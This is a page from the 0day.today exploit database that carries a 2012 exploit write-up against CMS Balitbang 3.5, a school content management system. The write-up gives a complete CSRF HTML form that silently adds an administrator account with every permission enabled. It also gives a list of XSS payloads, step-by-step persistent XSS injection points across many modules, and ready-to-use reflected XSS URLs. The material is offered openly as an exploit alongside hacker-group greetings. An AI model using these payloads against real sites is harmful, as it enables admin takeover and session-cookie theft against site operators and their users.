0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CMS Balitbang - CSRF/XSS Vulnerability
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 0 [x] Official Website: http://www.1337day.com 1 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0 0 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»» CMS Balitbang - CSRF/XSS Vulnerability «««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : CMS Balitbang - CSRF/XSS Vulnerability ./CMS Version : Tim Balitbang Depdiknas versi 3.5 - www.kajianwebsite.org ./Author Exploit: [ TheCyberNuxbie ] ./Security Risk : [ High Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Time & Date : June, 19 2012. 07:02 AM. ./System Tested : Windows 7 Ultimate, Firefox 9.0.1, Xampp-win32-1.7.3 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################ # - POC: CSRF + Presistent XSS + Reflected XSS: # 1.1 Exploit CSRF (Add Admin). # 2.1 Presistent XSS (id=buku). # 2.2 Presistent XSS (id=berita). # 2.3 Presistent XSS (id=artikel). # 2.4 Presistent XSS (8 Module). # 3.1 Reflected XSS. ############################################################################# # 1.1 Exploit - CSRF (Add Admin). # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Balitbang - CSRF Exploit</title> # </head> # <body><form action="http://balitbang/admin/admin.php" method="POST"> # <input type="hidden" name="newusername" value="hombrenk" readonly="readonly"> # <input type="hidden" name="newpassword" value="sempak123" readonly="readonly"> # <input type="hidden" name="newpassword2" value="sempak123" readonly="readonly"> # <input type="hidden" name="newemail" value="root@31337sec.com" readonly="readonly"> # <input name="artikel" type="checkbox" value="on" checked='checked'> # <input name="agenda" type="checkbox" value="on" checked='checked'> # <input name="berita" type="checkbox" value="on" checked='checked'> # <input name="bukutamu" type="checkbox" value="on" checked='checked'> # <input name="forum" type="checkbox" value="on" checked='checked'> # <input name="galeri" type="checkbox" value="on" checked='checked'> # <input name="link" type="checkbox" value="on" checked='checked'> # <input name="infoalumni" type="checkbox" value="on" checked='checked'> # <input name="infosekolah" type="checkbox" value="on" checked='checked'> # <input name="materiajar" type="checkbox" value="on" checked='checked'> # <input name="kumpulsoal" type="checkbox" value="on" checked='checked'> # <input name="silabus" type="checkbox" value="on" checked='checked'> # <input name="prestasi" type="checkbox" value="on" checked='checked'> # <input name="pesandepan" type="checkbox" value="on" checked='checked'> # <input name="jajak" type="checkbox" value="on" checked='checked'> # <input name="banner" type="checkbox" value="on" checked='checked'> # <input name="dtnilai" type="checkbox" value="on" checked='checked'> # <input name="dtmateri" type="checkbox" value="on" checked='checked'> # <input name="dtbpbk" type="checkbox" value="on" checked='checked'> # <input name="dtabsensi" type="checkbox" value="on" checked='checked'> # <input name="dtspp" type="checkbox" value="on" checked='checked'> # <input name="dtlaporan" type="checkbox" value="on" checked='checked'> # <input name="admin" type="checkbox" value="on" checked='checked'> # <input name="profil" type="checkbox" value="on" checked='checked'> # <input name="posisi" type="checkbox" value="on" checked='checked'> # <input name="template" type="checkbox" value="on" checked='checked'> # <input name="gambar" type="checkbox" value="on" checked='checked'> # <input name="kategori" type="checkbox" value="on" checked='checked'> # <input name="semester" type="checkbox" value="on" checked='checked'> # <input name="program" type="checkbox" value="on" checked='checked'> # <input name="kelas" type="checkbox" value="on" checked='checked'> # <input name="pelajaran" type="checkbox" value="on" checked='checked'> # <input name="dtguru" type="checkbox" value="on" checked='checked'> # <input name="importguru" type="checkbox" value="on" checked='checked'> # <input name="dtmengajar" type="checkbox" value="on" checked='checked'> # <input name="dtsiswa" type="checkbox" value="on" checked='checked'> # <input name="dtortu" type="checkbox" value="on" checked='checked'> # <input name="importsiswa" type="checkbox" value="on" checked='checked'> # <input name="membersiswa" type="checkbox" value="on" checked='checked'> # <input name="naikkelas" type="checkbox" value="on" checked='checked'> # <input name="dtalumni" type="checkbox" value="on" checked='checked'> # <input name="member" type="checkbox" value="on" checked='checked'> # <input name="koordinator" type="checkbox" value="on" checked='checked'> # <input name="opini" type="checkbox" value="on" checked='checked'> # <input type="hidden" name="mode" value="createadmin"><input type='reset' value='Ulang' > # <input type="submit" name="Submit" value="Simpan"> # </form> # </body> # </html> # # [ End of Code ] # # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # [xXx] Lets Rock Dude,,, :p # # [ Sample XSS Script ] # <script>alert(document.cookie);</script> # <script>alert('31337');</script> # <html><body><blink>XSSed By XXX</blink></body><html> # <script>window.open("http://www.google.com/")</script> # , etc... # # 2.1 Presistent XSS (id=buku) # - Go To Page: http://balitbang/html/index.php?id=buku # Post your messege XSS In any of the text fields, for this we used the captcha verification for the following messege. # # - Input Verification "captcha"... # "Kirim" (send this messege) # # - Affected Items (Presistent XSS - id=buku): # - Then if a USERS & ADMIN visits your page module "id=lih_buku" & "mode=buku_tamu". The Script XSS Will Be Execute. # http://balitbang/html/index.php?id=buku <--- Users Post XSS (frontend). # http://balitbang/html/index.php?id=lih_buku <--- If Users View This Page, The Script Will Execute. (frontend) # http://balitbang/admin/admin.php?mode=buku_tamu <--- If Admin View This Page, The Script Will Execute. (backend) # # 2.2 Presistent XSS (id=berita) # - Go To Page Berita: http://balitbang/html/index.php?id=berita&kode=xxx # Post your comment XSS In any of the text fields, for this we used the captcha verification for the following comment. # # - Input Verification "captcha"... # "Kirim" (send this comment) # # - Affected Items (Presistent XSS - id=berita): # - Then if a USERS & ADMIN visits your page module "id=berita" & "mode=beritakom". The Script XSS Will Be Execute. # http://balitbang/html/index.php?id=berita&kode=xxx <--- Users Post XSS (frontend). # http://balitbang/html/index.php?id=berita&kode=xxx <--- If Users View This Page, The Script Will Execute. (frontend) # http://balitbang/admin/admin.php?mode=beritakom&id=xxx <--- If Admin View This Page, The Script Will Execute. (backend) # # 2.3 Presistent XSS (id=artikel) # - Go To Page Articles: http://balitbang/html/index.php?id=artikel&kode=xxx # Post your comment XSS In any of the text fields, for this we used the captcha verification for the following comment. # # - Input Verification "captcha"... # "Kirim" (send this comment) # # - Affected Items (Presistent XSS - id=artikel): # - Then if a USERS & ADMIN visits your page module "id=artikel" & "mode=beritakom". The Script XSS Will Be Execute. # http://balitbang/html/index.php?id=artikel&kode=xxx <--- Users Post XSS (frontend). # http://balitbang/html/index.php?id=artikel&kode=xxx <--- If Users View This Page, The Script Will Execute. (frontend) # http://balitbang/admin/admin.php?mode=artikelkom&id=xxx <--- If Admin View This Page, The Script Will Execute. (backend) # # 2.4 Presistent XSS (Module: link, agenda artikel, diskusi, album, info, voting, soal, download). # Then if a ADMIN visits your page module (link, agenda artikel, diskusi, album, info, voting, soal, download). # [ If Admin View This Page "module", The Script Will Execute ] # [ If a Module Posted XSSed, effected at frontend website ] # # http://balitbang/admin/admin.php?mode=link_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=link <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/index.php?id=link <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=agenda_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=agenda <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/index.php?id=agenda <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=album_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=album <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/index.php?id=album <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=info_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=info <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/index.php?id=info <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=tam_voting <--- Post XSS # http://balitbang/admin/admin.php?mode=voting <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/index.php?id=lih_voting&kd=xxx <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=soal_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=soal&kode=xxx <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/guru.php?id=soal&kode=xxx <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=download_tam <--- Post XSS # http://balitbang/admin/admin.php?mode=download&kode=xxx <--- ADMIN View Presistent XSS. (backend) # http://balitbang/html/guru.php?id=materi&kode=xxx <--- USERS View Presistent XSS. (frontend) # # http://balitbang/admin/admin.php?mode=diskusi <--- Post XSS # http://balitbang/admin/admin.php?mode=diskusi2 <--- ADMIN View Presistent XSS. (backend) # http://balitbang/member/user.php?id=forum <--- USERS View Presistent XSS. (frontend) # # 3.1 Reflected XSS: # http://balitbang/member/user.php?id=simnilai&kd=<script>alert(document.cookie);</script> # http://balitbang/member/user.php?id=simmateri&kd=<script>alert(document.cookie);</script> # http://balitbang/admin/admin.php?mode=guru_member&nip=<script>alert(document.cookie);</script> # http://balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> # http://balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,, # ################################################################################# # [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ] # # [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ] # # [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ] # # -------------------[ We Are c0d3rs And We Are An Exploit ]------------------- # # [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ] # # [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, Sammy FORGIT, NoGe ] # # [ cr4wl3r, eidelweiss, v3n0m, g3mb3lz_YCL, team_elite, Hmei7, kaMtiEz, c4uR ] # # [ cyberlog, y3dips, K-159, the_day, irvian, k1tk4t, b374k, EA Ngel, OoN_Boy ] # # [ mywisdom, Flyff666, YaDoY666, jos_ali_joe, Vrs-hCk, OLiBekaS, vYc0d s4va ] # # [ Elmonny, Dencowbie, Cyberbag0r, r4h0x, SeekerUnZero, AfniGates, ./etc.. ] # ################################################################################# # 0day.today [2024-11-15] #